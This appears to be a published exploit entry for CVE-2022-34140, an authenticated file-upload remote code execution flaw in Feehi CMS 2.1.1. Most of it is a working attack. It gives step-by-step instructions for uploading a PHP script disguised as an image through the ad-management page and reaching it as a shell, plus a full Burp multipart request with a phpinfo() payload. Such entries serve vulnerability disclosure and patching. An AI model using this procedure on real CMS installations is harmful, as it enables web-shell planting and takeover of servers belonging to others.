Feehi CMS 2.1.1 Remote Code Execution

# Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)# Date: 22-08-2022# Exploit Author: yuyudhn# Vendor Homepage: https://feehi.com/# Software Link: https://github.com/liufee/cms# Version: 2.1.1 (REQUIRED)# Tested on: Linux, Docker# CVE : CVE-2022-34140# Proof of Concept:1. Login using admin account at http://feehi-cms.local/admin2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php.5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php# Burp request example:POST /admin/index.php?r=ad%2Fcreate HTTP/1.1Host: feehi-cms.localContent-Length: 1530Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://feehi-cms.localContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://feehi-cms.local/admin/index.php?r=ad%2FcreateAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7DConnection: close------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="_csrf_backend"FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg==------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[name]"rce------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[tips]"rce at Ad management------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[input_type]"1------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[ad]"------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php"Content-Type: image/png<?php phpinfo();------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[link]"--------------